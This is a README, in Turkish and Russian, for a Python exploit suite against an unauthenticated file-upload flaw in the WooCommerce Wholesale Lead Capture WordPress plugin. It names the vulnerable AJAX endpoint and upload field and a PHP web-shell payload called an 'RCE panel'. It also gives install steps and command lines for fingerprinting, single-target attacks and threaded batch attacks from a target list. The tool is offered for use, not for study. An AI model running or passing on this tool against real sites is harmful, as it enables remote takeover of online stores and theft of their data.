Python-набор эксплойтов для CVE-2026-27540 — неаутентифицированной RCE через загрузку файлов в плагине WooCommerce Wholesale Lead Capture, с фингерпринтингом, пакетным таргетингом и полезной нагрузкой для RCE-панели.
WooCommerce Wholesale Lead Capture (WWLC) — Kimlik doğrulamasız dosya yükleme → RCE
| Ürün | WooCommerce Wholesale Lead Capture — wwlc eklentisi |
| Sürüm | ≤ 2.0.3.1 |
| Fixed | 2.0.3.2+ — upload handler korumalı |
| Auth | Unauthenticated |
| Vektör | admin-ajax.php?action=wwlc_file_upload_handler |
| Field | file (multipart upload) |
| Yazılan yer | WordPress uploads dizini |
| Payload | payloads/x7-panel.php |
wwlc_file_upload_handler POST rate-limitgit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| Dosya | Görev |
|---|---|
winrarzips_brand.py | CMD banner (by winrarzips) |
wwlc_core.py | Exploit motoru |
CVE-2026-27540-Suite.py | Batch + tek hedef CLI |
payloads/x7-panel.php | RCE panel |
requirements.txt | Bağımlılıklar |
❌ Hedef listesi, tarama sonucu ve panel URL'leri repo'da yok.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed
WooCommerce Wholesale Lead Capture (WWLC) — загрузка файлов без аутентификации → RCE
| Продукт | WooCommerce Wholesale Lead Capture — плагин wwlc |
| Затронутые версии | ≤ 2.0.3.1 |
| Исправлено | 2.0.3.2+ — обработчик загрузки усилен |
| Аутентификация | Не требуется |
| Вектор | admin-ajax.php?action=wwlc_file_upload_handler |
| Поле | file (multipart upload) |
| Путь записи | Каталог uploads WordPress |
| Payload | payloads/x7-panel.php |
wwlc_file_upload_handlergit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| Файл | Назначение |
|---|---|
winrarzips_brand.py | CMD-баннер (by winrarzips) |
wwlc_core.py | Ядро эксплойта |
CVE-2026-27540-Suite.py | CLI для пакетной и одиночной цели |
payloads/x7-panel.php | Payload RCE-панели |
requirements.txt | Зависимости |
❌ Списки целей, результаты сканирования и URL активных панелей не включены.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed